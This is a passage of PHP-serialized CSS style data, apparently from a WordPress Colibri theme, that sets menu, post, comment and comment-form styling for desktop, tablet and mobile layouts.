box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: #f6f8fa;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(81, 105, 207);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(81, 105, 207);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: rgb(81, 105, 207);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu {\n justify-content: flex-end;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-42 \n ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-42 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: #303e7a;\n background-image: none;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n color: rgb(7, 29, 122);\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #303e7a;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #303e7a;\n}\n#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n color: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:43;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-43-offscreen {\n background-color: #222B34;\n background-image: none;\n width: 300px !important;\n}\n#colibri .style-43-offscreenOverlay {\n background-color: rgba(0,0,0,0.5);\n background-image: none;\n}\n#colibri .style-43 .h-hamburger-icon {\n background-color: rgba(0, 0, 0, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: solid;\n border-top-left-radius: 100%;\n border-top-right-radius: 100%;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: solid;\n border-bottom-left-radius: 100%;\n border-bottom-right-radius: 100%;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: solid;\n fill: white;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n width: 24px;\n height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:44;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:45;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:46;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-46 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:47;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-47-image {\n max-height: 70px;\n}\n#colibri .style-47 a,#colibri .style-47 .logo-text {\n color: #ffffff;\n text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-47-image,#colibri .h-navigation_sticky.style-47-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-47 a,#colibri .h-navigation_sticky .style-47 .logo-text,#colibri .h-navigation_sticky.style-47 a,#colibri .h-navigation_sticky.style-47 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:48;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:49;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-49 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:50;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-50 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:51;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:52;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:53;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:54;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:55;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:56;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:57;a:3:{s:7:\"desktop\";s:485:\"#colibri .style-57 {\n height: auto;\n min-height: unset;\n color: #f6f8fa;\n background-color: #303e7a;\n background-image: none;\n padding-top: 10px;\n padding-bottom: 50px;\n}\n#colibri .style-57 h1 {\n color: #f6f8fa;\n}\n#colibri .style-57 h2 {\n color: #f6f8fa;\n}\n#colibri .style-57 h3 {\n color: #f6f8fa;\n}\n#colibri .style-57 h4 {\n color: #f6f8fa;\n}\n#colibri .style-57 h5 {\n color: #f6f8fa;\n}\n#colibri .style-57 h6 {\n color: #f6f8fa;\n}\n#colibri .style-57 p {\n color: #f6f8fa;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:58;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:59;a:3:{s:7:\"desktop\";s:166:\"#colibri .style-59-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n#colibri .style-59 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:60;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:61;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:62;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-62 {\n height: auto;\n min-height: unset;\n padding-top: 30px;\n padding-bottom: 30px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:63;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:64;a:3:{s:7:\"desktop\";s:156:\".style-64 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-64 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:65;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:66;a:3:{s:7:\"desktop\";s:482:\"#colibri .style-66 {\n background-color: #FFFFFF;\n background-image: none;\n box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:109:\"#colibri .style-66 {\n margin-top: 10px;\n margin-right: 10px;\n margin-bottom: 10px;\n margin-left: 10px;\n}\n\";}i:67;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-67 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:68;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:69;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:70;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:71;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:72;a:3:{s:7:\"desktop\";s:76:\"#colibri .style-72 {\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:73;a:3:{s:7:\"desktop\";s:209:\".style-73 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-73 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:74;a:3:{s:7:\"desktop\";s:245:\"#colibri .style-74 {\n background-color: rgba(255,255,255,0);\n background-image: none;\n text-align: center;\n}\n#colibri .style-74 .colibri-post-thumbnail-shortcode img {\n height: 300px;\n object-position: center center;\n object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:75;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:76;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-76 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:77;a:3:{s:7:\"desktop\";s:630:\"#colibri .style-77 svg {\n width: 18px ;\n height: 18px;\n display: none;\n margin-right: 5px;\n}\n#colibri .style-77 .metadata-suffix {\n font-size: 14px;\n}\n#colibri .style-77 .metadata-suffix:hover {\n color: rgb(70, 112, 127);\n}\n#colibri .style-77 .metadata-suffix:hover {\n color: rgb(70, 112, 127);\n}\n#colibri .style-77 .metadata-prefix {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-77 a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-77 a:hover {\n color: #17252a;\n}\n#colibri .style-77 a:hover {\n color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:78;a:3:{s:7:\"desktop\";s:166:\"#colibri .style-78 .colibri-post-content {\n margin-bottom: 0px;\n color: rgb(23, 37, 42);\n}\n#colibri .style-78 .colibri-post-content p {\n color: rgb(37, 41, 42);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:79;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-79 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:80;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-80 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:81;a:3:{s:7:\"desktop\";s:304:\"#colibri .style-81 {\n font-size: 14px;\n line-height: 1.6;\n color: rgb(37, 41, 42);\n margin-right: 5px;\n}\n#colibri .style-81 p {\n font-size: 14px;\n line-height: 1.6;\n color: rgb(37, 41, 42);\n}\n#colibri .style-81 ul {\n list-style-type: disc;\n}\n#colibri .style-81 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:82;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-82 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:83;a:3:{s:7:\"desktop\";s:462:\"#colibri .style-83 .categories-prefix {\n margin-right: 16px;\n}\n#colibri .style-83 a,#colibri .style-83 .colibri-post-category {\n margin-right: 5px;\n margin-left: 5px;\n text-decoration: none;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\n#colibri .style-83 a:hover,#colibri .style-83 .colibri-post-category:hover {\n color: #17252a;\n}\n#colibri .style-83 a:hover,#colibri .style-83 .colibri-post-category:hover {\n color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:84;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:85;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-85 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:86;a:3:{s:7:\"desktop\";s:344:\"#colibri .style-86 {\n font-weight: 400;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(37, 41, 42);\n margin-right: 5px;\n}\n#colibri .style-86 p {\n font-weight: 400;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(37, 41, 42);\n}\n#colibri .style-86 ul {\n list-style-type: disc;\n}\n#colibri .style-86 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:87;a:3:{s:7:\"desktop\";s:155:\".style-87 > .h-y-container > *:not(:last-child) {\n margin-bottom: 23px;\n}\n#colibri .style-87 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:88;a:3:{s:7:\"desktop\";s:487:\"#colibri .style-88 .tags-prefix {\n margin-right: 5px;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-88 a,#colibri .style-88 .colibri-post-tag {\n margin-right: 5px;\n margin-left: 5px;\n text-decoration: none;\n font-size: 14px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\n#colibri .style-88 a:hover,#colibri .style-88 .colibri-post-tag:hover {\n color: #17252a;\n}\n#colibri .style-88 a:hover,#colibri .style-88 .colibri-post-tag:hover {\n color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:89;a:3:{s:7:\"desktop\";s:452:\"#colibri .style-89 {\n margin-right: 30px;\n margin-left: 30px;\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:66:\"#colibri .style-89 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";s:6:\"mobile\";s:66:\"#colibri .style-89 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:90;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-90 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:91;a:3:{s:7:\"desktop\";s:758:\"#colibri .style-91 .post-title {\n max-width: 40ch;\n}\n#colibri .style-91 .nav-previous a,#colibri .style-91 .nav-next a {\n text-decoration: none;\n color: rgb(23, 37, 42);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n background-color: unset;\n background-image: none;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n color: #03a9f4;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:92;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-92 {\n text-align: right;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:93;a:3:{s:7:\"desktop\";s:651:\"#colibri .style-93 .nav-previous a,#colibri .style-93 .nav-next a {\n text-decoration: none;\n color: rgb(23, 37, 42);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n color: #03a9f4;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:94;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-94 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:95;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:96;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:97;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:98;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:99;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:100;a:3:{s:7:\"desktop\";s:125:\"#colibri .style-100 {\n text-align: left;\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 15px;\n}\n\";s:6:\"tablet\";s:47:\"#colibri .style-100 {\n padding-bottom: 5px;\n}\n\";s:6:\"mobile\";s:47:\"#colibri .style-100 {\n padding-bottom: 5px;\n}\n\";}i:101;a:3:{s:7:\"desktop\";s:3577:\"#colibri .style-101 .comments-disabled {\n text-align: center;\n margin-bottom: 0px;\n text-decoration: none;\n color: rgb(37, 41, 42);\n}\n#colibri .style-101 .children {\n margin-left: 12px;\n}\n#colibri .style-101 .comment-body .reply a {\n margin-bottom: 10px;\n font-weight: 400;\n text-transform: lowercase;\n font-size: 1em;\n line-height: 1.5;\n color: #03a9f4;\n}\n#colibri .style-101 .comment-body .reply a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-body .reply a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-content {\n text-decoration: none;\n font-size: 16px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-101 .comment-content p {\n color: rgb(37, 41, 42);\n}\n#colibri .style-101 .comment-content a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-metadata {\n text-decoration: none;\n font-size: 14px;\n color: rgb(70, 112, 127);\n background-color: unset;\n background-image: none;\n transition-duration: 0.5s;\n}\n#colibri .style-101 .comment-metadata:hover {\n color: #17252a;\n}\n#colibri .style-101 .comment-metadata:hover {\n color: #17252a;\n}\n#colibri .style-101 .comment-author .url {\n font-weight: 600;\n font-style: normal;\n text-decoration: none;\n color: rgb(23, 37, 42);\n background-color: unset;\n background-image: none;\n margin-left: 5px;\n}\n#colibri .style-101 .comment-author img {\n width: 30px ;\n height: 30px;\n background-color: unset;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-101 .comment-meta {\n color: rgb(153, 153, 153);\n margin-bottom: 16px;\n}\n#colibri .style-101 .comments-title {\n font-family: Open Sans;\n font-weight: 600;\n text-decoration: none;\n font-size: 1.25em;\n color: #17252a;\n}\n#colibri .style-101 .comment.odd {\n background-color: rgba(166, 220, 244, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n padding-top: 12px;\n padding-right: 12px;\n padding-bottom: 12px;\n padding-left: 12px;\n}\n#colibri .style-101 .comment.even {\n background-color: #FFFFFF;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n padding-top: 12px;\n padding-right: 12px;\n padding-bottom: 12px;\n padding-left: 12px;\n}\n#colibri .style-101 .blog-post-comments {\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:102;a:3:{s:7:\"desktop\";s:4032:\"#colibri .comment-respond {\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n padding-top: 15px;\n}\n#colibri .comment-respond .comment-notes {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"] {\n background-color: #03a9f4;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #FFFFFF;\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n background-color: rgb(2, 110, 159);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n background-color: rgb(2, 110, 159);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:active {\n background-color: #03a9f4;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n 